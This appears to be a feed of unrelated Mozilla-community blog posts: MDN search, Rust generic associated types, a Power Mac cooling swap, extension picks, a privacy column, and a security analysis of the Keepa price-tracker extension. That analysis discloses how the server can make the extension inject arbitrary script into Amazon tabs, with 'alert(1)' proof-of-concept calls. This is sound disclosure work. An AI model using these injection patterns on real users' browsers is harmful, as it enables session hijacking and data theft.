Hacks.Mozilla.OrgHow MDN’s autocomplete search works

Last month, Gregor Weber and I added an autocomplete search to MDN Web Docs, that allows you to quickly jump straight to the document you’re looking for by typing parts of the document title. This is the story about how that’s implemented. If you stick around to the end, I’ll share an “easter egg” feature that, once you’ve learned it, will make you look really cool at dinner parties. Or, perhaps you just want to navigate MDN faster than mere mortals.

MDN's autocomplete search in action

In its simplest form, the input field has an onkeypress event listener that filters through a complete list of every single document title (per locale). At the time of writing, there are 11,690 different document titles (and their URLs) for English US. You can see a preview by opening https://developer.mozilla.org/en-US/search-index.json. Yes, it’s huge, but it’s not too huge to load all into memory. After all, together with the code that does the searching, it’s only loaded when the user has indicated intent to type something. And speaking of size, because the file is compressed with Brotli, the file is only 144KB over the network.

Implementation details

By default, the only JavaScript code that’s loaded is a small shim that watches for onmouseover and onfocus for the search <input> field. There’s also an event listener on the whole document that looks for a certain keystroke. Pressing / at any point, acts the same as if you had used your mouse cursor to put focus into the <input> field. As soon as focus is triggered, the first thing it does is download two JavaScript bundles which turns the <input> field into something much more advanced. In its simplest (pseudo) form, here’s how it works:

<input 
 type="search" 
 name="q"
 onfocus="startAutocomplete()" 
 onmouseover="startAutocomplete()"
 placeholder="Site search..." 
 value="q">
let started = false;
function startAutocomplete() {
  if (started) {
    return false;
  }
  const script = document.createElement("script");
  script.src = "/static/js/autocomplete.js";
  document.head.appendChild(script);
}

Then it loads /static/js/autocomplete.js which is where the real magic happens. Let’s dig deeper with the pseudo code:

(async function() {
  const response = await fetch('/en-US/search-index.json');
  const documents = await response.json();
  
  const inputValue = document.querySelector(
    'input[type="search"]'
  ).value;
  const flex = FlexSearch.create();
  documents.forEach(({ title }, i) => {
    flex.add(i, title);
  });

  const indexResults = flex.search(inputValue);
  const foundDocuments = indexResults.map((index) => documents[index]);
  displayFoundDocuments(foundDocuments.slice(0, 10));
})();

As you can probably see, this is an oversimplification of how it actually works, but it’s not yet time to dig into the details. The next step is to display the matches. We use (TypeScript) React to do this, but the following pseudo code is easier to follow:

function displayFoundResults(documents) {
  const container = document.createElement("ul");
  documents.forEach(({url, title}) => {
    const row = document.createElement("li");
    const link = document.createElement("a");
    link.href = url;
    link.textContent = title;
    row.appendChild(link);
    container.appendChild(row);
  });
  document.querySelector('#search').appendChild(container);
}

Then with some CSS, we just display this as an overlay just beneath the <input> field. For example, we highlight each title according to the inputValue and various keystroke event handlers take care of highlighting the relevant row when you navigate up and down.

Ok, let’s dig deeper into the implementation details

We create the FlexSearch index just once and re-use it for every new keystroke. Because the user might type more while waiting for the network, it’s actually reactive so executes the actual search once all the JavaScript and the JSON XHR have arrived.

Before we dig into what this FlexSearch is, let’s talk about how the display actually works. For that we use a React library called downshift which handles all the interactions, displays, and makes sure the displayed search results are accessible. downshift is a mature library that handles a myriad of challenges with building a widget like that, especially the aspects of making it accessible.

So, what is this FlexSearch library? It’s another third party that makes sure that searching on titles is done with natural language in mind. It describes itself as the “Web’s fastest and most memory-flexible full-text search library with zero dependencies.” which is a lot more performant and accurate than attempting to simply look for one string in a long list of other strings.

Deciding which result to show first

In fairness, if the user types foreac, it’s not that hard to reduce a list of 10,000+ document titles down to only those that contain foreac in the title, then we decide which result to show first. The way we implement that is relying on pageview stats. We record, for every single MDN URL, which one gets the most pageviews as a form of determining “popularity”. The documents that most people decide to arrive on are most probably what the user was searching for.

Our build-process that generates the search-index.json file knows about each URLs number of pageviews. We actually don’t care about absolute numbers, but what we do care about is the relative differences. For example, we know that Array.prototype.forEach() (that’s one of the document titles) is a more popular page than TypedArray.prototype.forEach(), so we leverage that and sort the entries in search-index.json accordingly. Now, with FlexSearch doing the reduction, we use the “natural order” of the array as the trick that tries to give users the document they were probably looking for. It’s actually the same technique we use for Elasticsearch in our full site-search. More about that in: How MDN’s site-search works.

The easter egg: How to search by URL

Actually, it’s not a whimsical easter egg, but a feature that came from the fact that this autocomplete needs to work for our content creators. You see, when you work on the content in MDN you start a local “preview server” which is a complete copy of all documents but all running locally, as a static site, under http://localhost:5000. There, you don’t want to rely on a server to do searches. Content authors need to quickly move between documents, so much of the reason why the autocomplete search is done entirely in the client is because of that.

Commonly implemented in tools like the VSCode and Atom IDEs, you can do “fuzzy searches” to find and open files simply by typing portions of the file path. For example, searching for whmlemvo should find the file files/web/html/element/video. You can do that with MDN’s autocomplete search too. The way you do it is by typing / as the first input character.

Activate "fuzzy search" on MDN

It makes it really quick to jump straight to a document if you know its URL but don’t want to spell it out exactly.
In fact, there’s another way to navigate and that is to first press / anywhere when browsing MDN, which activates the autocomplete search. Then you type / again, and you’re off to the races!

How to get really deep into the implementation details

The code for all of this is in the Yari repo which is the project that builds and previews all of the MDN content. To find the exact code, click into the client/src/search.tsx source code and you’ll find all the code for lazy-loading, searching, preloading, and displaying autocomplete searches.

The post How MDN’s autocomplete search works appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language BlogThe push for GATs stabilization

The push for GATs stabilization

Where to start, where to start...

Let's begin by saying: this is a very exciting post. Some people reading this will be overwhelmingly thrilled; some will have no idea what GATs (generic associated types) are; others might be in disbelief. The RFC for this feature did get opened in April of 2016 (and merged about a year and a half later). In fact, this RFC even predates const generics (which an MVP of was recently stabilized). Don't let this fool you though: it is a powerful feature; and the reactions to the tracking issue on Github should maybe give you an idea of its popularity (it is the most upvoted issue on the Rust repository): GATs reactions

If you're not familiar with GATs, they allow you to define type, lifetime, or const generics on associated types. Like so:

trait Foo {
    type Bar<'a>;
}

Now, this may seem underwhelming, but I'll go into more detail later as to why this really is a powerful feature.

But for now: what exactly is happening? Well, nearly four years after its RFC was merged, the generic_associated_types feature is no longer "incomplete."

crickets chirping

Wait...that's it?? Well, yes! I'll go into a bit of detail later in this blog post as to why this is a big deal. But, long story short, there have been a good amount of changes that have had to have been made to the compiler to get GATs to work. And, while there are still a few small remaining diagnostics issues, the feature is finally in a space that we feel comfortable making it no longer "incomplete".

So, what does that mean? Well, all it really means is that when you use this feature on nightly, you'll no longer get the "generic_associated_types is incomplete" warning. However, the real reason this is a big deal: we want to stabilize this feature. But we need your help. We need you to test this feature, to file issues for any bugs you find or for potential diagnostic improvements. Also, we'd love for you to just tell us about some interesting patterns that GATs enable over on Zulip!

Without making promises that we aren't 100% sure we can keep, we have high hopes we can stabilize this feature within the next couple months. But, we want to make sure we aren't missing glaringly obvious bugs or flaws. We want this to be a smooth stabilization.

Okay. Phew. That's the main point of this post and the most exciting news. But as I said before, I think it's also reasonable for me to explain what this feature is, what you can do with it, and some of the background and how we got here.

So what are GATs?

Note: this will only be a brief overview. The RFC contains many more details.

GATs (generic associated types) were originally proposed in RFC 1598. As said before, they allow you to define type, lifetime, or const generics on associated types. If you're familiar with languages that have "higher-kinded types", then you could call GATs type constructors on traits. Perhaps the easiest way for you to get a sense of how you might use GATs is to jump into an example.

Here is a popular use case: a LendingIterator (formerly known as a StreamingIterator):

trait LendingIterator {
    type Item<'a> where Self: 'a;

    fn next<'a>(&'a mut self) -> Option<Self::Item<'a>>;
}

Let's go through one implementation of this, a hypothetical <[T]>::windows_mut, which allows for iterating through overlapping mutable windows on a slice. If you were to try to implement this with Iterator today like

struct WindowsMut<'t, T> {
    slice: &'t mut [T],
    start: usize,
    window_size: usize,
}

impl<'t, T> Iterator for WindowsMut<'t, T> {
    type Item = &'t mut [T];

    fn next<'a>(&'a mut self) -> Option<Self::Item> {
        let retval = self.slice[self.start..].get_mut(..self.window_size)?;
        self.start += 1;
        Some(retval)
    }
}

then you would get an error.

error[E0495]: cannot infer an appropriate lifetime for lifetime parameter in function call due to conflicting requirements
  --> src/lib.rs:9:22
   |
9  |         let retval = self.slice[self.start..].get_mut(..self.window_size)?;
   |                      ^^^^^^^^^^^^^^^^^^^^^^^^
   |
note: first, the lifetime cannot outlive the lifetime `'a` as defined on the method body at 8:13...
  --> src/lib.rs:8:13
   |
8  |     fn next<'a>(&'a mut self) -> Option<Self::Item> {
   |             ^^
note: ...so that reference does not outlive borrowed content
  --> src/lib.rs:9:22
   |
9  |         let retval = self.slice[self.start..].get_mut(..self.window_size)?;
   |                      ^^^^^^^^^^
note: but, the lifetime must be valid for the lifetime `'t` as defined on the impl at 6:6...
  --> src/lib.rs:6:6
   |
6  | impl<'t, T: 't> Iterator for WindowsMut<'t, T> {
   |      ^^

Put succinctly, this error is essentially telling us that in order for us to be able to return a reference to self.slice, it must live as long as 'a, which would require a 'a: 't bound (which we can't provide). Without this, we could call next while already holding a reference to the slice, creating overlapping mutable references. However, it does compile fine if you were to implement this using the LendingIterator trait from before:

impl<'t, T> LendingIterator for WindowsMut<'t, T> {
    type Item<'a> where Self: 'a = &'a mut [T];

    fn next<'a>(&'a mut self) -> Option<Self::Item<'a>> {
        let retval = self.slice[self.start..].get_mut(..self.window_size)?;
        self.start += 1;
        Some(retval)
    }
}

As an aside, there's one thing to note about this trait and impl that you might be curious about: the where Self: 'a clause on Item. Briefly, this allows us to use &'a mut [T]; without this where clause, someone could try to return Self::Item<'static> and extend the lifetime of the slice. We understand that this is a point of confusion sometimes and are considering potential alternatives, such as always assuming this bound or implying it based on usage within the trait (see this issue). We definitely would love to hear about your use cases here, particularly when assuming this bound would be a hindrance.

As another example, imagine you wanted a struct to be generic over a pointer to a specific type. You might write the following code:

trait PointerFamily {
    type Pointer<T>: Deref<Target = T>;

    fn new<T>(value: T) -> Self::Pointer<T>;
}

struct ArcFamily;
struct RcFamily;

impl PointerFamily for ArcFamily {
    type Pointer<T> = Arc<T>;
    ...
}
impl PointerFamily for RcFamily {
    type Pointer<T> = Rc<T>;
    ...
}

struct MyStruct<P: PointerFamily> {
    pointer: P::Pointer<String>,
}

We won't go in-depth on the details here, but this example is nice in that it not only highlights the use of types in GATs, but also shows that you can still use the trait bounds that you already can use on associated types.

These two examples only scratch the surface of the patterns that GATs support. If you find any that seem particularly interesting or clever, we would love to hear about them over on Zulip!

Why has it taken so long to implement this?

So what has caused us to have taken nearly four years to get to the point that we are now? Well, it's hard to put into words how much the existing trait solver has had to change and adapt; but, consider this: for a while, it was thought that to support GATs, we would have to transition rustc to use Chalk, a potential future trait solver that uses logical predicates to solve trait goals (though, while some progress has been made, it's still very experimental even now).

For reference, here are some various implementation additions and changes that have been made that have furthered GAT support in some way or another:

  • Parsing GATs in AST (#45904)
  • Resolving lifetimes in GATs (#46706)
  • Initial trait solver work to support lifetimes (#67160)
  • Validating projection bounds (and making changes that allow type and const GATs) (#72788)
  • Separating projection bounds and predicates (#73905)
  • Allowing GATs in trait paths (#79554)
  • Partially replace leak check with universes (#65232)
  • Move leak check to later in trait solving (#72493)
  • Replacing bound vars in GATs with placeholders when projecting (#86993)

And to further emphasize the work above: many of these PRs are large and have considerable design work behind them. There are also several smaller PRs along the way. But, we made it. And I just want to congratulate everyone who's put effort into this one way or another. You rock.

What limitations are there currently?

Ok, so now comes the part that nobody likes hearing about: the limitations. Fortunately, in this case, there's really only one GAT limitation: traits with GATs are not object safe. This means you won't be able to do something like

fn takes_iter(_: &mut dyn for<'a> LendingIterator<Item<'a> = &'a i32>) {}

The biggest reason for this decision is that there's still a bit of design and implementation work to actually make this usable. And while this is a nice feature, adding this in the future would be a backward-compatible change. We feel that it's better to get most of GATs stabilized and then come back and try to tackle this later than to block GATs for even longer. Also, GATs without object safety are still very powerful, so we don't lose much by defering this.

As was mentioned earlier in this post, there are still a couple remaining diagnostics issues. If you do find bugs though, please file issues!

Wladimir PalantData exfiltration in Keepa Price Tracker

As readers of this blog might remember, shopping assistants aren’t exactly known for their respect of your privacy. They will typically use their privileged access to your browser in order to extract data. For them, this ability is a competitive advantage. You pay for a free product with a privacy hazard.

Usually, the vendor will claim to anonymize all data, a claim that can rarely be verified. Even if the anonymization actually happens, it’s really hard to do this right. If anonymization can be reversed and the data falls into the wrong hands, this can have severe consequences for a person’s life.

Meat grinder with the Keepa logo on its side is working on the Amazon logo, producing lots of prices and stars<figcaption> Image credits: Keepa, palomaironique, Nikon1803 </figcaption>

Today we will take a closer look at a browser extension called “Keepa – Amazon Price Tracker” which is used by at least two million users across different browsers. The extension is being brought out by a German company and the privacy policy is refreshingly short and concise, suggesting that no unexpected data collection is going on. The reality however is: not only will this extension extract data from your Amazon sessions, it will even use your bandwidth to load various Amazon pages in the background.

The server communication

The Keepa extension keeps a persistent WebSocket connection open to its server dyn.keepa.com. The server parameters include your unique user identifier, stored both in the extension and as a cookie on keepa.com. As a result, this identifier will survive both clearing browse data and reinstalling the extension, you’d have to do both for it to be cleared. If you choose to register on keepa.com, this identifier will also be tied to your user name and email address.

Looking at the messages being exchanged, you’ll see that these are binary data. But they aren’t encrypted, it’s merely deflate-compressed JSON-data.

Developer tools showing binary messages being exchanged

You can see the original message contents by copying the message as a Base64 string, then running the following code in the context of the extension’s background page:

pako.inflate(atob("eAGrViouSSwpLVayMjSw0FFQylOyMjesBQBQGwZU"), {to: "string"});

This will display the initial message sent by the server:

{
  "status": 108,
  "n": 71
}

What does Keepa learn about your browsing?

Whenever I open an Amazon product page, a message like the following is sent to the Keepa server:

{
  "payload": [null],
  "scrapedData": {
    "tld": "de"
  },
  "ratings": [{
    "rating": "4,3",
    "ratingCount": "2.924",
    "asin": "B0719M4YZB"
  }],
  "key": "f1",
  "domainId": 3
}

This tells the server that I am using Amazon Germany (the value 3 in domainId stands for .de, 1 would have been .com). It also indicates the product I viewed (asin field) and how it was rated by Amazon users. Depending on the product, additional data like the sales rank might be present here. Also, the page scraping rules are determined by the server and can change any time to collect more sensitive data.

A similar message is sent when an Amazon search is performed. The only difference here is that ratings array contains multiple entries, one for each article in your search results. While the search string itself isn’t being transmitted (not with the current scraping rules at least), from the search results it’s trivial to deduce what you searched for.

Extension getting active on its own

That’s not the end of it however. The extension will also regularly receive instructions like the following from the server (shortened for clarity):

{
  "key": "o1",
  "url": "https://www.amazon.de/gp/aod/ajax/ref=aod_page_2?asin=B074DDJFTH&…",
  "isAjax": true,
  "httpMethod": 0,
  "domainId": 3,
  "timeout": 8000,
  "scrapeFilters": [{
    "sellerName": {
      "name": "sellerName",
      "selector": "#aod-offer-soldBy div.a-col-right > a:first-child",
      "altSelector": "#aod-offer-soldBy .a-col-right span:first-child",
      "attribute": "text",
      "reGroup": 0,
      "multiple": false,
      "optional": true,
      "isListSelector": false,
      "parentList": "offers",
      "keepBR": false
    },
    "rating": {
      "name": "rating",
      "selector": "#aod-offer-seller-rating",
      "attribute": "text",
      "regExp": "(\\d{1,3})\\s?%",
      "reGroup": 1,
      "multiple": false,
      "optional": true,
      "isListSelector": false,
      "parentList": "offers",
      "keepBR": false
    },
    
  }],
  "l": [{
    "path": ["chrome", "webRequest", "onBeforeSendHeaders", "addListener"],
    "index": 1,
    "a": {
      "urls": ["<all_urls>"],
      "types": ["main_frame", "sub_frame", "stylesheet", "script", ]
    },
    "b": ["requestHeaders", "blocking", "extraHeaders"]
  }, , null],
  "block": "(https?:)?\\/\\/.*?(\\.gif|\\.jpg|\\.png|\\.woff2?|\\.css|adsystem\\.)\\??"
}

The address https://www.amazon.de/gp/aod/ajax/ref=aod_page_2?asin=B074DDJFTH belongs to an air compressor, not a product I’ve ever looked at but one that Keepa is apparently interested in. The extension will now attempt to extract data from this page despite me not navigating to it. Because of isAjax flag being set here, this address is loaded via XMLHttpRequest, after which the response text is being put into a frame of extensions’s background page. If isAjax flag weren’t set, this page would be loaded directly into another frame.

The scrapeFilters key sets the rules to be used for analyzing the page. This will extract ratings, prices, availability and any other information via CSS selectors and regular expressions. Here Keepa is also interested in the seller’s name, elsewhere in the shipping information and security tokens. There is also functionality here to read out contents of the Amazon cart, I didn’t look too closely at that however.

The l key is also interesting. It tells the extension’s background page to call a particular method with the given parameters, here chrome.webRequest.onBeforeSendHeaders.addListener method is being called. The index key determines which of the predefined listeners should be used. The purpose of the predefined listeners seems to be removing some security headers as well as making sure headers like Cookie are set correctly.

The server’s effective privileges

Let’s take a closer look at the privileges granted to the Keepa server here, these aren’t entirely obvious. Loading pages in the background isn’t meant to happen within the user’s usual session, there is some special cookie handling meant to produce a separate session for scraping only. This doesn’t appear to always work reliably, and I am fairly certain that the server can make pages load in the usual Amazon session, rendering it capable of impersonating the user towards Amazon. As the server can also extract arbitrary data, it is for example entirely possible to add a shipping address to the user’s Amazon account and to place an order that will be shipped there.

The l key is also worth taking a second look. At first the impact here seems limited by the fact that the first parameter will always be a function, one out of a few possible functions. But the server could use that functionality to call eval.call(function(){}, "alert(1)") in the context of the extension’s background page and execute arbitrary JavaScript code. Luckily, this call doesn’t succeed thanks to the extension’s default Content Security Policy.

But there are more possible calls, and some of these succeed. For example, the server could tell the extension to call chrome.tabs.executeScript.call(function(){}, {code: "alert(1)"}). This will execute arbitrary JavaScript code in the current tab if the extension has access to it (meaning any Amazon website). It would also be possible to specify a tab identifier in order to inject JavaScript into background tabs: chrome.tabs.executeScript.call(function(){}, 12, {code: "alert(1)"}). For this the server doesn’t need to know which tabs are open: tab identifiers are sequential, so it’s possible to find valid tab identifiers simply by trying out potential candidates.

Privacy policy

Certainly, a browser extension collecting all this data will have a privacy policy to explain how this data is used? Here is the privacy policy of the German-based Keepa GmbH in full:

You can use all of our services without providing any personal information. However, if you do so we will not sell or trade your personal information under any circumstance. Setting up a tracking request on our site implies that you’d like us to contact you via the contact information you provided us. We will do our best to only do so if useful and necessary - we hate spam as much as you do. If you login/register using Social-Login or OpenID we will only save the username and/or email address of the provided data. Should you choose to subscribe to one of our fee-based subscriptions we will share your email and billing address with the chosen payment provider - solely for the purpose of payment related communication and authentication. You can delete all your information by deleting your account through the settings.

This doesn’t sound right. Despite being linked under “Privacy practices” in the Chrome Web Store, it appears to apply only to the Keepa website, not to any of the extension functionality. The privacy policy on the Mozilla Add-ons site is more specific despite also being remarkably short (formatting of the original preserved):

You can use this add-on without providing any personal information. If you do opt to share contact information, we will only use it to provide you updates relevant to your tracking requests. Under no circumstances will your personal information be made available to a third party. This add-on does not collect any personal data beyond the contact information provided by you.

Whenever you visit an Amazon product page the ASIN (Amazon Standard Identification Number) of that product is used to load its price history graph from Keepa.com. We do not log such requests.

The extension creates required functional cookies containing a session and your settings on Keepa.com, which is required for session management (storing settings and accessing your Keepa.com account, if you create one). No other (tracking, advertising) cookies are created.

This refers to some pieces of the Keepa functionality but it once again completely omits the data collection outlined here. It’s reassuring to know that they don’t log product identifiers when showing product history, but they don’t need to if on another channel their extension sends far more detailed data to the server. This makes the first sentence, formatted as bold text, a clear lie. Unless of course you don’t consider the information collected here personal. I’m not a lawyer, maybe in the legal sense it isn’t.

I’m fairly certain however that this privacy policy doesn’t meet the legal requirements of the GDPR. To be compliant it would need to mention the data being collected, explain the legal grounds for doing so, how it is being used, how long it is being kept and who it is shared with.

That said, this isn’t the only regulation violated by Keepa. As a German company, they are obliged to publish a legal note (in German: Impressum) on their website so that visitors can immediately recognize the party responsible. Keepa hides both this information and the privacy policy in a submenu (one has to click “Information” first) under the misleading name “Disclaimer.” The legal requirements are for both pages to be reachable with one click, and the link title needs to be unambiguous.

Conclusions

Keepa extension is equipped to collect any information about your Amazon visits. Currently it will collect information about the products you look at and the ones you search for, all that tied to a unique and persistent user identifier. Even without you choosing to register on the Keepa website, there is considerable potential for the collected data to be deanonymized.

Some sloppy programming had the (likely unintended) consequence of making the server even more powerful, essentially granting it full control over any Amazon page you visit. Luckily, the extension’s privileges don’t give it access to any websites beyond Amazon.

The company behind the extension fails to comply with its legal obligations. The privacy policy is misleading in claiming that no personal data is being collected. It fails to explain how the data is being used and who it is shared with. There are certainly companies interested in buying detailed online shopping profiles, and a usable privacy policy needs to at least exclude the possibility of the data being sold.

Cameron KaiserAnd now for something completely different: "Upgrading" your Quad G5 LCS

One of the most consistently popular old posts on this blog is our discussion on long-life computing and how to extend the working, arguably even useful, life of your Power Mac. However, what I think gives it particular continued traction is it has a section on how to swap out the liquid cooling system of the Quad G5, obviously the most powerful Power Macintosh ever made and one of the only two G5 systems I believe worth using (the other being the dual-processor 2.3GHz, as it is aircooled). LCSes are finicky beasts under the best of conditions and certain liquid-cooled models of the G5 line have notoriously bad reputations for leakage. My parents' dual 2.5GHz, for example, succumbed to a leak and it ended up being a rather ugly postmortem.

The Quad G5 is one of the better ones in this regard and most of the ones that would have suffered early deaths already have, but it still requires service due to evaporative losses and sediment, and any Quad on its original processors is by now almost certainly a windtunnel under load. An ailing LCS, even an intact one, runs the real risk of an unexpected shutdown if the CPU it can no longer cool effectively ends up exceeding its internal thermal limits; you'll see a red OVERTEMP light illuminate on the logic board when this is imminent, followed by a CHECKSTOP. Like an automotive radiator it is possible to open the LCS up and flush the coolant (and potentially service the pumps), but this is not a trivial process. Additionally, those instructions are for the single-pump Delphi version 1 assembly, which is the more reliable of the two; the less reliable double-pump Cooligy version 2 assemblies are even harder to work on.

Unfortunately our current employment situation requires I downsize, so I've been starting on consolidating or finding homes for excess spare systems. I had several spare Quad G5 systems in storage in various states, all version 2 Cooligy LCSes, but the only LCS assemblies I have in stock (and the LCS in my original Quad G5) are version 1. These LCSes were bought Apple Certified Refurbished, so they were known to be in good condition and ready to go; as the spare Quads were all on their original marginal LCSes and processors, I figured I would simply "upgrade" the best-condition v2 G5 with a v1 assembly. The G5 service manual doesn't say anything about this, though it has nothing in it indicating that they aren't interchangeable, or that they need different logic boards or ROMs, and now having done it I can attest that it "just works." So here's a few things to watch out for.

Both the v1 and the v2 assemblies have multiple sets of screws: four "captive" (not really) float plate screws, six processor mount screws, four terminal assembly screws (all of which require a 3mm flathead hex driver), and four captive ballheads (4mm ballhead hex). Here's the v1, again:

And here's the v2. Compare and contrast.
The float plate screws differ between the two versions, and despite the manual calling them "captive" can be inadvertently removed. If your replacement v1 doesn't have float plate screws in it, as mine didn't, the system will not boot unless they are installed (along with the terminal assembly screws, which are integral portions of the CPU power connections). I had to steal them from a dead G5 core module that I fortunately happen to have kept.

Once installed, the grey inlet frame used in the v2 doesn't grip the v1:

The frame is not a necessary part. You can leave it out as the front fan module and clear deflector are sufficient to direct airflow. However, if you have a spare v1 inlet frame, you can install that; the mounting is the same.

The fan and pump connector cable is also the same between v1 and v2, though you may need to move the cable around a bit to get the halves to connect if it was in a wacky location.

Now run thermal calibration, and enjoy your renewed Apple PowerPC tank.

Firefox Add-on ReviewsSupercharge your productivity with a browser extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right browser extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped; and organize everything into shareable topics or collections.

<figcaption>With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages. </figcaption>

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Focus! Focus! Focus!

Anti-distraction extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle avoiding certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits. 

Just list the websites you want to avoid for specified periods of time (certain hours of the day or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature where you’re automatically redirected to a more productive website anytime you try to visit a time waster 

<figcaption>Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site</figcaption>

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—like blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages) to setting restrictions on predetermined days (e.g. no Twitter on weekends) to 60-second delayed access to certain websites to give you time to reconsider that potentially productivity killing decision. 

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (which is also time customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tranquility Reader

Imagine a world wide web where everything but the words are stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font size and colors, add annotations to saved pages, and more. 

We hope some of these great extensions will give your productivity a serious boost! Fact is there are a vast number of extensions out there that could possibly help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more. 

The Mozilla Blog2021: The year privacy went mainstream

It’s been a hell of a year so far for data privacy. Apple has been launching broadsides at the ad-tech industry with each new big privacy feature unveiling. Google is playing catch-up, promising that Android users will also soon be able to stop apps from tracking them across the internet. Then there’s WhatsApp, going on a global PR offensive after changes to its privacy policy elicited consumer backlash.      

There’s no doubt about it, digital privacy is shaping up as the key tech battleground in 2021 and the years ahead. But how did this happen? Wasn’t digital privacy supposed to be dead and buried by now? After all, many tech CEOs and commentators have told us that a zero-privacy world was inevitable and that everyone should just get used to it. Until recently, it would have been tough to argue that they were wrong.

Over the last 18 months, events have conspired to accelerate this shift in public attitudes towards privacy from a niche concern to something much more fundamental and mainstream. In the process, more people also began to see how privacy and security are inextricably linked.

The abrupt shift to remote working prompted by COVID-19 “stay at home” orders globally was the first crank of the engine. Many of us have had to use personal devices and work in less-than-secure home environments, exposing vast swathes of corporate data to greater risk.

The result has been something of a crash course in cybersecurity for all involved. Workers have had to navigate VPNs in order to access their company networks and learn how to keep their employer’s data safe. Those that didn’t suffered the consequences. In August 2020, MalwareBytes reported that 20% of organizations had had a data breach due to remote working.

Mozilla VPN, a Virtual Private Network from the makers of Firefox.

Protect all your devices

With home working here to stay in some form at least, employees must now be kept updated on cybersecurity best practice to ensure their networks stay protected. This should seep into people’s own online habits, prompting them to be more cautious and to adopt better everyday security hygiene.

Then there was the COVID-19 public health response, with contact tracing apps and vaccine passports putting health privacy front of mind. Their introduction raised thorny questions about how to balance managing the spread of the virus with respecting data privacy. In the UK, privacy fears forced the government to scrap the original version of its contact tracing app and switch to a decentralized operating model.

As mass vaccinations roll out, attention has since turned to vaccine passport apps. In New York, the Excelsior Pass controversially uses private blockchain technology leading to criticism that developer IBM and the state government are hiding behind the blockchain gimmick rather than genuinely earning the trust of the public to protect their information. As a result, the Linux Foundation is now working to develop a set of standards that protects our privacy when we use these apps. This is a significant step forward and provides a baseline for digital privacy protections that could be referenced in the development of other apps.

It’s not just the pandemic that has opened more eyes to privacy issues. Over a tumultuous summer, law enforcement agencies across the U.S. flaunted surveillance powers that brought home just how flimsy our privacy protections truly are.

At the peak of the Black Lives Matter protests, authorities were able to identify protestors via facial recognition tech and track them down using phone location data. To combat this, major news outlets like Time and human rights organizations such as Amnesty International published articles on how we can protect our digital privacy while protesting. The encrypted messaging app Signal even developed an anti-facial recognition mask which they distributed to Black Lives Matter protesters for free.

Finally, moves from Apple over the past year have really hammered home the growing demand for protecting our personal data. The introduction of privacy labels to the App Store means we can now get an idea of an app’s privacy practices before we download it. The iOS 14.5 update also made app tracking opt-in only. A whopping 96% of U.S. users chose not to opt-in, showing just how much consumer behaviour is changing. Needless to say Google has followed suit in some regards, announcing its own version of privacy labels to come next year for Android owners.

This last point is important. Big tech companies have the power to force each other’s hands and shape our lives. If they continue seeing  that digital privacy can be profitable, then there’s a great chance it’s here to stay.

Looking back to 2018 when the Cambridge Analytica / Facebook scandal broke, digital privacy was on life support, hanging on by a thread. That shocking moment proved to be the tipping point when many people looked up to see a less private and less secure reality, one which they didn’t want. Since then, many tech companies have found themselves firmly in the sights of a Congress looking to take them down a peg or two. States, led by California, began enacting consumer privacy legislation. Meanwhile in Europe, the introduction of GDPR has been an opening salvo for what strong international consumer privacy protections can look like. Countries like India and Kenya have also begun to consider a data protection law, impacting the privacy of over a billion users on the internet.

But what can we do to demand more for our digital privacy? A good place to start is by using alternatives to big tech platforms like Google, Facebook and Amazon. Switching from Google Chrome to a privacy-focused browser like Mozilla Firefox is a good first step, and maybe it’s time you considered deleting Facebook for good. Until these platforms clean up their act, we can take action by avoiding them all together. We can also ask our local senators and representatives to vote for legislation that will safeguard us online, such as the Fourth Amendment is Not for Sale Act. The Electronic Frontier Foundation runs numerous campaigns online to help us do this and you can get involved via their Action Center

It’s the combination of companies protecting their bottom lines, pressure from regulators, and extraordinary societal moments where we are seeing a turning point in favor of consumer privacy, and there is no going back. As consumers of technology, we must never take these privacy gains for granted and continue pressing for more.

Callum Tennent is a guest opinion columnist for Mozilla’s Distilled blog. He is Site Editor of Top10VPN and a consumer technology journalist as well as a former product testing professional at Which? Magazine. You can find more information about him here and follow him on Twitter at @TennentCallum.

The post 2021: The year privacy went mainstream appeared first on The Mozilla Blog.

Mozilla Addons BlogNew tagging feature for add-ons on AMO

There are multiple ways to find great add-ons on addons.mozilla.org (AMO). You can browse the content featured on the homepage, use the top navigation to drill down into add-on types and categories, or search for specific add-ons or functionality. Now, we’re adding another layer of classification and opportunities for discovery by bringing back a feature called tags.

